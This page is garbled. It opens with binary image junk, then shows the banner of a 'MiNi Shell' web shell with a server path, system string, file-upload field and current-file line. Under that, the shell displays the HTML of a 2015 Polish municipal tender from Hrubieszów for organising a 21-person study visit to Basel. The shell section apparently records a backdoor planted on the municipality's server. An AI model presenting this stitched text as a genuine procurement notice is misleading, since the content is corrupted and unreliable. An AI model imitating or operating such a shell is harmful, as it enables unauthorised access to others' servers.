JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150827/127343-N-2015.html

<p class="kh_header"><b>Hrubieszów: ORGANIZACJA WIZYTY STUDYJNEJ DO KANTONU BAZYLEA W SZWAJCARII DLA  PRZEDSTAWICIELI WŁADZ SAMORZĄDOWYCH GMIN PODREGIONU GOTANIA W ILOŚCI 21 OSÓB,  W RAMACH REALIZACJI PROJEKTU OD WIZJI DO NOWOCZESNEGO ZARZĄDZANIA PODREGIONEM GOTANIA</b><br>
<b>Numer ogłoszenia: 127343 - 2015; data zamieszczenia: 27.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Hrubieszów , ul. mjr H. Dobrzańskiego "Hubala" 1, 22-500 Hrubieszów, woj. lubelskie, tel. 084 6962380 w. 56, faks 084 6962380.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umhrubieszow.bip.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ORGANIZACJA WIZYTY STUDYJNEJ DO KANTONU BAZYLEA W SZWAJCARII DLA  PRZEDSTAWICIELI WŁADZ SAMORZĄDOWYCH GMIN PODREGIONU GOTANIA W ILOŚCI 21 OSÓB,  W RAMACH REALIZACJI PROJEKTU OD WIZJI DO NOWOCZESNEGO ZARZĄDZANIA PODREGIONEM GOTANIA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja  wizyty studyjnej do Kantonu BAZYLEA w Szwajcarii dla 21 osób - przedstawicieli władz samorządowych gmin podregionu Gotania.  Możliwe jest rozszerzenie wizyty o kantony sąsiadujące z kantonem BAZYLEA tj. np. Aargau, Solothurn, Fricktal. Usługa będąca kosztem organizacji wizyty studyjnej realizowana jest  w ramach Projektu Od wizji do nowoczesnego zarządzania podregionem Gotania, współfinansowanego przez Szwajcarię w ramach szwajcarskiego programu współpracy z nowymi krajami członkowskimi Unii Europejskiej. 

A. Szczegółowy opis przedmiotu zamówienia:
Zamawiający ustala (dla obu możliwych terminów) następujące warunki organizacji wizyty:
SOBOTA (10 lub 17 październik 2015): wyjazd uczestników wizyty z Hrubieszowa; obiad w trasie oraz nocleg w hotelu min. 3 gwiazdkowym w standardzie europejskim, pokoje jednoosobowe, zapewnienie uczestnikom kolacji.  NIEDZIELA (11 lub 18 październik): śniadanie i wyjazd uczestników do Szwajcarii, obiad w trasie,  przyjazd do hotelu  min. 3 gwiazdkowego w standardzie europejskim w Bazylei, ze SPA i Centrum Odnowy Biologicznej. Dopuszcza się lokalizację hotelu w odległości nie większej niż 50 km od Bazylei i wyłącznie na terenie Szwajcarii, spełniającego wymagania Zamawiającego.  Kolacja w dniu przyjazdu. PONIEDZIAŁEK (12 lub 19 październik 2015): spotkania merytoryczne - realizacja programu, obiad, kolacja. WTOREK (13 lub 20 październik 2015): spotkania merytoryczne - realizacja programu, obiad, kolacja. ŚRODA (14 lub 21 październik 2015): spotkanie merytoryczne - realizacja programu, obiad, w godzinach popołudniowych wykwaterowanie z hotelu i wyjazd ze Szwajcarii (bez noclegu w drodze powrotnej). Wykonawca zapewnia uczestnikom wyżywienie w podróży powrotnej (kolacja w środę, śniadanie, obiad i kolacja w czwartek). Planowany przyjazd do Hrubieszowa w czwartek. 
Poza minimum pięcioma spotkaniami merytorycznymi w ramach 3-dniowego pobytu w Szwajcarii, Wykonawca zapewni w wolnym czasie uzgodniony z Zamawiającym program kulturalno-turystyczny dla uczestników wizyty (np. zwiedzanie atrakcji turystycznych, przejazd kolejką górską, jak również kulturalne formy zagospodarowania czasu wolnego - filharmonia, operetka, koncert, zabawa przy muzyce, itp.).

B. Termin realizacji zamówienia: 
Zamawiający ustala dwa możliwe terminy organizacji wizyty:
I termin: 10-15 październik 2015
II termin: 17-22 październik 2015
Ostateczna data organizacji wizyty zostanie ustalona pomiędzy Wykonawcą a  Zamawiającym w dniu  podpisania umowy.  Dopuszcza się za zgodą Zamawiającego możliwość organizacji wizyty w innym terminie proponowanym przez wybranego Wykonawcę, przy czym wizyta musi zakończyć się do dnia 29 października 2015 r.

C. Usługa transportowa: Wykonawca zapewni transport  21 osób (uczestników wizyty) oraz tłumacza i dwóch kierowców. Ustala się transport samochodowy autokarem klasy VIP CLASS rocznik 2015.
Pojazd zapewniony przez Wykonawcę powinien być wyposażony co najmniej                           w komfortowe uchylno-rozsuwane fotele z podłokietnikiem, podnóżki, klimatyzację, indywidulane nawiewy i oświetlenie, stacjonarne ogrzewanie, pasy bezpieczeństwa przy każdym fotelu, toaletę, stoliki, barek, lodówkę oraz sprzęt audio video (radio + CD)                   i mikrofon. Wykonawca zapewnia dla uczestników wizyty serwis kawowy podczas podróży do Szwajcarii i w drodze powrotnej. Wykonawca podstawia pojazd w stanie czystym, zarówno na zewnątrz, jak i wewnątrz oraz zobowiązuje się do dbania                      o czystość autokaru podczas podróży. W celu zapewnienia komfortowych warunków podróży, kierujący pojazdem na prośbę uczestników wizyty, ma uruchamiać klimatyzację lub ogrzewanie. Autokar powinien posiadać min. 50 miejsc. Wykonawca zobowiązany jest zapewnić na czas podróży trzech kierowców.
Sporządzając ofertę należy przyjąć, że podczas wizyty zostanie pokonana trasa o długości do 4500 km. Preferowana trasa przejazdu tranzytowego - przez terytorium Niemiec. 
W przypadku awarii pojazdu w trakcie realizacji zamówienia, Wykonawca zobowiązany jest zapewnić zastępczy środek transportu o takich samych lub lepszych parametrach wymaganych w SIWZ, który pozwoli na planową kontynuację programu wizyty. Wykonawca pokrywa koszty opłat drogowych i parkingowych oraz koszty uzyskania wszelkich pozwoleń niezbędnych przy realizacji zamówienia. Wykonawca zapewnia transport na miejscu realizacji wizyty, zapewniając dowóz uczestników do miejsc,                          w których będzie realizowany program wizyty.

D. Usługa tłumaczenia z/na język niemiecki: Wykonawca zapewnia i pokrywa wszelkie koszty udziału w wizycie profesjonalnego tłumacza konsekutywnego języka niemieckiego. Zadaniem tłumacza będzie prowadzenie tłumaczeń ustnych (konsekutywnych) z/na język niemiecki podczas realizacji programu wizyty w Szwajcarii, jak również podczas podróży w obie strony. Tłumacz musi się wykazać doświadczeniem w tłumaczeniu konsekutywnym w okresie ostatnich 3 lat przed terminem składania ofert co najmniej 3 wizyt studyjnych z języka niemieckiego na język polski i odwrotnie na terenie krajów niemieckojęzycznych. Zamawiający wymaga wysokich kwalifikacji tłumacza w zakresie znajomości języka (musi posiadać tytuł magistra filologii lub kwalifikacje językowe na poziomie C2 - zgodnie ze skalą biegłości językowej według Rady Europy). Najpóźniej w dniu podpisania umowy Wykonawca podaje Zamawiającemu nazwisko tłumacza oraz przedstawia stosowne dokumenty i referencje potwierdzające spełnienie przez tłumacza wymogów Zamawiającego określonych w p. II.D.  

E. Ubezpieczenie uczestników wizyty: Wykonawca zobowiązuje się do zawarcia na rzecz uczestników wizyty studyjnej umowy ubezpieczenia od następstw nieszczęśliwych wypadków na kwotę nie niższą niż 10 000,00 zł. NNW na osobę, kosztów leczenia na kwotę nie niższą niż 20 000 EURO KL na osobę, ubezpieczenia bagażu na kwotę nie niższą niż 1 000,00 zł. na osobę. Wymaganą polisę ubezpieczenia Wykonawca dostarczy Zamawiającemu na 2 dni przed terminem wyjazdu.

F. Przygotowanie szczegółowego programu i koordynacja wizyty studyjnej pod kątem osiągnięcia założonych celów.

Cel wizyty studyjnej
- nawiązanie współpracy z gminami Kantonu Bazylea i/lub z gminami w sąsiadujących kantonach (np. Aargau, Solothurn, Fricktal),
- zapoznanie się ze szwajcarskimi doświadczeniami i dobrymi praktykami z dziedzinie rozwoju agroturystyki, sposobu tworzenia i zarządzania produktami turystycznymi,
- polityka władz wspierająca rozwój lokalnej przedsiębiorczości: otwartość na nowych inwestorów, ulgi podatkowe, zwolnienia, dotacje itp.
- współpraca tamtejszych władz z lokalnym biznesem i organizacjami pozarządowymi
- stosowanie efektywnych i innowacyjnych formy promocji gminy

G. Zakres obowiązków Wykonawcy:
W ramach przedmiotu umowy Wykonawca zobowiązany jest do zaplanowania                                             i opracowania programu wizyty studyjnej pod względem merytorycznym, jak i logistycznym oraz realizację i rozliczenie wizyt umożliwiających realizację celów określonych w p. F, w tym zwłaszcza:

1) zorganizowania minimum pięciu merytorycznych spotkań uczestników wizyty studyjnej odpowiednio z władzami gmin w Kantonie Bazylea lub innymi gminami uzgodnionymi z Zamawiającym, przedstawicielami organizacji pozarządowych, lokalnymi przedsiębiorcami, itp. pod kątem osiągnięcia założonych celów wizyty sformułowanych przez Zamawiającego. Po podpisaniu umowy, najpóźniej 5 dni przed planowanym wyjazdem, Wykonawca przedłoży szczegółowy program merytoryczny wizyty, który będzie musiał uzyskać akceptację Zamawiającego. Po uzyskaniu akceptacji przez Zamawiającego, Wykonawca przystąpi do realizacji organizacji wizyty;

2) zorganizowania programu kulturalno-turystycznego dla uczestników wizyty podczas 3-dniowego pobytu w Szwajcarii (np. zwiedzanie atrakcji turystycznych, przejazd kolejką górską, jak również kulturalne formy zagospodarowania czasu wolnego - filharmonia, operetka, koncert, zabawa przy muzyce, itp.). Wybór odpowiedniego programu musi być omówiony i zaakceptowany przez Zamawiającego. Ustala się dzienny koszt organizacji programu kulturalno-turystycznego w wysokości 45 CHF na jednego uczestnika wizyty;
 
3) zapewnienia w ramach wizyty 4 noclegów (podczas podróży do Szwajcarii oraz w miejscu realizacji wizyty), w hotelu min. 3 gwiazdkowym w standardzie europejskim, w tym: 1 nocleg w podróży (preferowany nocleg tranzytowy na terenie Niemiec) - pokoje jednoosobowe z łazienką oraz 3 noclegi w Szwajcarii  w pokojach jednoosobowych z łazienką  w hotelu  min. 3 gwiazdkowym w standardzie europejskim w Bazylei lub w innym mieście kantonalnym, wyłącznie na terenie Szwajcarii. Hotel powinien być zlokalizowany nie dalej niż 5 km od centrum miasta, spełniający wymagania Zamawiającego oraz powinien dysponować SPA i Centrum Odnowy Biologicznej.                          W wizycie weźmie udział 21 uczestników. Wykonawca zapewnia nocleg dla tłumacza i kierowców;
             

                   
4) zapewnienia dla uczestników wizyty wyżywienia podczas podróży i pobytu  w Szwajcarii:  
- 5 śniadań (w tym 2 w podróży i 3 w Szwajcarii w miejscu przebiegu wizyty) dla 21 osób; preferowany szwedzki stół, napoje, kawa, herbata, soki
- 6 obiadów (w tym 3 w podróży i 3 w Szwajcarii w miejscu przebiegu wizyty) dla 21 osób. Obiady dwudaniowe
- 6 kolacji (w tym 3 w podróży i 3 w Szwajcarii w miejscu przebiegu wizyty) dla 21 osób. Kolacje dwudaniowe. Do posiłków wykonawca zapewni napoje tj. kawa, herbata, napoje.

5) zapewnienia podczas wizyt odpowiedniego nadzoru i koordynację właściwego przebiegu wizyty na miejscu: zapewnienie  koordynatora/osoby odpowiedzialnej wskazanej przez Wykonawcę do kontaktów roboczych z uczestnikami wizyty studyjnej, w tym udział koordynatora we wszystkich spotkaniach i wydarzeniach przewidzianych programem wizyty; 

Lista uczestników wizyty zostanie określona przez Zamawiającego.

Wykonawca pokrywa ewentualne koszty zakwaterowania, wyżywienia oraz inne koszty dla osób niezbędnych do realizacji przedmiotu zamówienia. 
Jeżeli w SIWZ przy opisie przedmiotu zamówienia wskazana została nazwa producenta, znak towarowy, patent lub pochodzenie w stosunku do określonych materiałów, urządzeń, itp. Zamawiający wymaga, aby traktować takie wskazanie jako przykładowe i dopuszcza zastosowanie przy realizacji zamówienia materiałów, urządzeń, itp. równoważnych o parametrach nie gorszych niż wskazane.

Wykonawca może zastosować materiały równoważne, ale muszą one być nie gorsze od materiałów zastosowanych w dokumentacji lub muszą przewyższać jakością materiały ujęte w dokumentacji. W przypadku zastosowania materiałów równoważnych dotyczących zamówienia wykonawca przedstawi niezbędne certyfikaty lub badania dla wszystkich materiałów tzw. równoważnych na etapie składania ofert.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Zamawiający wymaga złożenia oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zostały wykonane a w przypadku okresowych lub ciągłych są wykonywane należycie, co najmniej dwie usługi odpowiadające swoim charakterem przedmiotowi zamówienia. Zamawiający uzna za odpowiadającą swoim charakterem usługę stanowiącą przedmiot zamówienia polegającą na zorganizowaniu wizyty studyjnej w kraju lub za granicą, z zapewnieniem transportu, noclegów i wyżywienia dla min. 10 osób, uczestników wizyty - zgodnie z załącznikiem nr 6 do SIWZ
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów: 
Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, na rzecz których dostawy lub usługi zostały wykonane oraz załączeniem dokumentu potwierdzającego, że dostawy lub usługi te zostały wykonane lub są wykonywane należycie zgodnie z załącznikiem nr 6 do SIWZ
Do wykazu należy dołączyć dowody potwierdzające, że wskazane usługi były wykonane należycie, a także wskazujące ich wartość i termin realizacji oraz inne wymagane w SIWZ cechy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku w tym zakresie. Na potwierdzenie spełnienia tego warunku Zamawiający wymaga złożenia oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku w tym zakresie. Na potwierdzenie spełnienia tego warunku Zamawiający wymaga złożenia oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku w tym zakresie. Zamawiający wymaga aby Wykonawca znajdował się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
Na potwierdzenie spełnienia tego warunku Zamawiający wymaga złożenia oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty, stanowiący załącznik nr 1  do  SIWZ
2.	W przypadku udziału podwykonawców - załącznik nr 3 do SIWZ
3.	Pisemne zobowiązanie innych  podmiotów do oddania wykonawcy  do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - załącznik nr 8 do SIWZ ( jeżeli dotyczy) 
4.	Informacja w sprawie obowiązku podatkowego wynikającego z art. 91 ust.3a ustawy
       pzp - załącznik nr 9</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Z Wykonawcą, którego oferta zostanie uznana przez Zamawiającego za ofertę najkorzystniejszą, zostanie podpisana umowa. Projekt umowy stanowi Załącznik nr 2 do SIWZ.
2.	Dopuszcza się wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania o udzielenie zamówienia  publicznego.
3.	W przypadkach przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą Zamawiającego.
4.	Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.
5.	Zmiany umowy, o których mowa w ust. 1 muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3 ustawy Prawo zamówień publicznych, stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawarte w specyfikacji istotnych warunków zamówienia.
6.	Wszelkie zmiany postanowień niniejszej umowy mogą nastąpić pisemnie, za zgodą obu stron, z zastrzeżeniem ust. 5.
7.	Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
a)	termin realizacji: w przypadku działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającej bezpośredni wpływ na terminowość wykonania usług oraz w przypadku zaistnienia niekorzystnych warunków klimatycznych, 
b)	wynagrodzenie - w następstwie zmiany przepisów o podatku od towarów i usług (VAT),
c)	przedmiot umowy - jeżeli konieczność wprowadzenia zmian jest skutkiem zmiany 
przepisów prawa lub wynika z okoliczności, których strony umowy nie mogły przewidzieć w momencie składania ofert.
8.	Nie stanowi zmiany umowy:
1)	zmiana danych związanych z obsługą administracyjno - organizacyjną umowy,
2)	zmiana danych teleadresowych, osób reprezentujących strony lub oznaczenia stron umowy - wynikających ze zmiany stanu faktycznego albo prawnego.  
9.	Dokonanie zmian, o których mowa  w ust. 7 wymaga podpisania aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
